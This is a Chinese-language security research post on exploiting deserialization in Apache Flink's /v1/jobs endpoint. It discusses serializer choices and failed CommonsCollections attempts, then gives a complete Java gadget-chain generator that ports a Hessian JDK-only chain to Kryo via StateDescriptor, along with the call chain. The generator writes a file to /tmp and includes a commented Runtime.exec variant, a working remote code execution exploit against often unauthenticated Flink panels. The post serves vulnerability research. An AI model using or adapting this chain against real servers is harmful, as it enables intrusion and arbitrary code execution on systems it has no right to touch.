ApacheFlink反序列化的探索

前言

最近看了一些Flink的利用手法,一些文章中虽提到了其反序列化利用点的利用技巧,但在高版本中无法进行利用,通过对代码逻辑的深入分析,本文提出了一种新的反序列化利用技巧。

探索

现有思路回顾

在向/v1/jobs路由POST数据时,Flink会对数据内容进行反序列化操作,对应的方法位于org.apache.flink.runtime.rest.handler.job.JobSubmitHandler#loadJobGraph

在此处会进行java原生的反序列化操作,同时在Flink 的 org.apache.flink.api.common.state.StateDescriptor类的readObject方法中,支持切换其他的反序列化器对数据进行二次反序列化

在现有的利用方法中,主要是配合低版本Flink存在的任意文件写漏洞写入恶意类,同时使用PojoSerializer 来二次反序列化数据,在进行类加载时会自动执行static代码块,执行恶意类中的恶意代码

在高版本中已经修复了任意文件写漏洞,导致这种方法显得比较鸡肋,因此需要一条不依赖写文件辅助的利用链。

序列化器的探索

前面我们知道了传入的数据可以选择反序列化器对数据进行二次反序列化,首先看一下有哪些可用的反序列化器(看哪些类继承了TypeSerializer ),由于第一次看Flink的代码,这里我根据名字用肉眼筛选了两个值得看的序列化器 PojoSerializerKryoSerializer

PojoSerializer

反序列化逻辑代码位于

org.apache.flink.api.java.typeutils.runtime.PojoSerializer#deserialize(org.apache.flink.core.memory.DataInputView)

在实例化类的过程中,需要目标类有0参的构造方法,在还原属性时全部使用反射来恢复属性,整体流程中没有额外的调用到其他方法,很难构造成利用链

KryoSerializer

反序列化逻辑代码位于

org.apache.flink.api.java.typeutils.runtime.kryo.KryoSerializer#deserialize(org.apache.flink.core.memory.DataInputView)

在该方法中使用了Kryo来反序列化数据,跟进Kryo的反序列化逻辑

在此处支持再次选择序列化器来反序列化数据,我们看看Kryo的序列化器有哪些

同样的,我挑选了几个看起来可以利用的序列化器来分析

  • BeanSerializer : 在恢复属性的时候调用相应的setter方法,第一眼看马上会让人联想到类似Fastjson的调用链,但其实是是用不了的,因为其调用setter方法的逻辑是必须有相应的属性存在,且按照首字母排列顺序来恢复属性
  • CollectionSerializer :恢复成员的时候调用集合的add方法
  • FieldSerializer :通过反射恢复属性
  • JavaSerializer :使用java原生反序列化方法来恢复数据
  • MapSerializer :恢复成员的时候调用Map的put方法

反序列化链探索

失败的commonscollections

通过上面的分析,基本将目光着眼于kryo中的CollectionSerializer 和 MapSerializer这两个序列化器,因此看了一眼flink的依赖,发现存在着commons-collections 3.2.2的依赖,在Kryo的机制中,由于不会调用readObject,因此3.2.2对于反序列化的防御不会影响到Kryo反序列化,为了方便分析,我从网上找了一张关于CC链的总结图

图源:https://daidaitiehanhan.github.io/2022/04/30/java安全漫谈观后感(十一)-CC加强篇/

结合上图和两个序列化器的特点,我们要找的source点需要为Map或Collection的子类,这里我尝试了TiedMapEntry 和 PriorityQueue 这两个类,但很不幸都失败了。下面来看看具体原因

  • TiedMapEntry :主要是由于后续需要用到LazyMap,而其父类中存在着transient的map属性无法赋值,但在后续的利用链中需要用到,因此没办法利用
  • PriorityQueue:主要由于其默认会使用CollectionSerializer来恢复集合内容,但不会恢复需要用到的comparator,导致在compare的时候链子断掉,在这里我也尝试强制为PriorityQueue配置其他的序列化器(类似下面的代码),但没有发现可以利用的方法

    1
    2
    ExecutionConfig config = new ExecutionConfig();
    config.addDefaultKryoSerializer(PriorityQueue.class, new CompatibleFieldSerializer(new Kryo(),CompatibleFieldSerializer.class).getType());

    不过我觉得这里继续翻翻源码还是有很大机会的,在这里标一下目前我的思路

    1
    2
    3
    4
    5
    java.util.PriorityQueue#add
    java.util.PriorityQueue#offer
    java.util.PriorityQueue#siftUp
    java.util.PriorityQueue#siftUpUsingComparator
    ...后面接原生反序列化的链子即可

Hessian原生链的迁移

通过上面对序列化器的分析,我发现其某些过程与hessian反序列化有很多相似之处,例如都可以反序列化不实现Serializable的类,均不调用readObject,对于Map的还原均有对应的序列化器逻辑等等,因此我尝试将hessian的原生链的逻辑迁移过来,的确成功的进行了利用,具体的逻辑可以查看之前的文章:https://mp.weixin.qq.com/s/u7RuSmBHy76R7_PqL8WJww

在这里给出符合Flink情景下利用的代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
package org.example;

import org.apache.flink.api.common.ExecutionConfig;
import org.apache.flink.api.common.state.StateDescriptor;
import org.apache.flink.api.common.state.ValueStateDescriptor;
import org.apache.flink.api.java.typeutils.runtime.kryo.KryoSerializer;
import sun.reflect.misc.MethodUtil;
import sun.swing.SwingLazyValue;
import javax.management.BadAttributeValueExpException;
import javax.swing.*;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Array;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Hashtable;


public class BeanSerTest {

public static void main(String[] args) throws Exception {
ExecutionConfig config = new ExecutionConfig();

KryoSerializer serializer = new KryoSerializer(Object.class,config);

//==================================================================================
Class<?> cMimeTypeParameterList = Class.forName("java.awt.datatransfer.MimeTypeParameterList");
Constructor<?> conMimeTypeParameterList= cMimeTypeParameterList.getDeclaredConstructor();
conMimeTypeParameterList.setAccessible(true);
Object mimeTypeParameterList = conMimeTypeParameterList.newInstance();
Field fparameters = cMimeTypeParameterList.getDeclaredField("parameters");
fparameters.setAccessible(true);
Hashtable<String, String> stringHashtable = new Hashtable<>();
stringHashtable.put("abc","xxxxxxxxxxxx");


BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(new Object());
Class<?> cbadAttributeValueExpException = Class.forName("javax.management.BadAttributeValueExpException");
Field fval = cbadAttributeValueExpException.getDeclaredField("val");
fval.setAccessible(true);
fval.set(badAttributeValueExpException,mimeTypeParameterList);
Method invoke = MethodUtil.class.getMethod("invoke", Method.class, Object.class, Object[].class);
Method mexec = Runtime.class.getMethod("exec", String.class);
Object runtime = Runtime.getRuntime();
// Object[] ags = new Object[]{invoke, new Object(), new Object[]{mexec,runtime , new Object[]{"touch /tmp/pwned"}}};
// SwingLazyValue swingLazyValue = new SwingLazyValue("sun.reflect.misc.MethodUtil", "invoke",ags);
Object[] ags = new Object[]{"/tmp/pwned",new byte[]{36,37}};

SwingLazyValue swingLazyValue = new SwingLazyValue("com.sun.org.apache.xml.internal.security.utils.JavaUtils", "writeBytesToFilename",ags);



Object[] keyValueList = new Object[]{"abc",swingLazyValue};


UIDefaults uiDefaults1 = new UIDefaults(keyValueList);
UIDefaults uiDefaults2 = new UIDefaults(keyValueList);

Hashtable<Object, Object> hashtable1 = new Hashtable<>();
Hashtable<Object, Object> hashtable2 = new Hashtable<>();
hashtable1.put("a",uiDefaults1);
hashtable2.put("a",uiDefaults2);

HashMap<Object, Object> s = new HashMap<>();
setFieldValue(s, "size", 2);
Class<?> nodeC;
try {
nodeC = Class.forName("java.util.HashMap$Node");
}
catch ( ClassNotFoundException e ) {
nodeC = Class.forName("java.util.HashMap$Entry");
}
Constructor<?> nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
nodeCons.setAccessible(true);

Object tbl = Array.newInstance(nodeC, 2);
Array.set(tbl, 0, nodeCons.newInstance(0, hashtable1, hashtable1, null));
Array.set(tbl, 1, nodeCons.newInstance(0, hashtable2, hashtable2, null));
setFieldValue(s, "table", tbl);


//==================================================================================

StateDescriptor stateDescriptor = new ValueStateDescriptor("hello", serializer, s);

ObjectOutputStream objOutput = new ObjectOutputStream(new FileOutputStream("test.ser"));
objOutput.writeObject(stateDescriptor);
objOutput.close();

}
public static void setFieldValue(Object obj,String fieldname,Object value)throws Exception{
Field field = obj.getClass().getDeclaredField(fieldname);
field.setAccessible(true);
field.set(obj,value);
}
public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
Field field = obj.getClass().getDeclaredField(fieldName);
field.setAccessible(true);
return field.get(obj);
}
}

调用链:

1
2
3
4
5
6
7
8
com.esotericsoftware.kryo.serializers.MapSerializer#read
java.util.HashMap#put
java.util.HashMap#putVal
java.util.Hashtable#equals
java.util.Hashtable#equals
javax.swing.UIDefaults#get(java.lang.Object)
javax.swing.UIDefaults#getFromHashtable
sun.swing.SwingLazyValue#createValue

总结

在一些场景下,该链条可以称为Kryo OnlyJdk了,但其通用性并不如hessian广泛,主要因为kryo在反序列化前需要配置注册类,而上述的Flink自己实现了自动注册的逻辑,因此在一些使用了kryo的框架中,如果其自动化程度较高,还是有很多利用空间的。

值得注意的是,Flink本身就允许用户执行自己编写的代码,因此该类问题并不算是安全漏洞,在其官方安全策略文档中也特别解释了这一点,详见https://flink.apache.org/zh/security.html

Flink默认配置下不需要鉴权即可访问控制面板,因此建议使用者对面板功能添加权限校验。

参考链接

https://www.anquanke.com/post/id/227668

https://y4er.com/posts/apache-flink-cve-2020-17518-17519-rce

https://forum.butian.net/index.php/share/40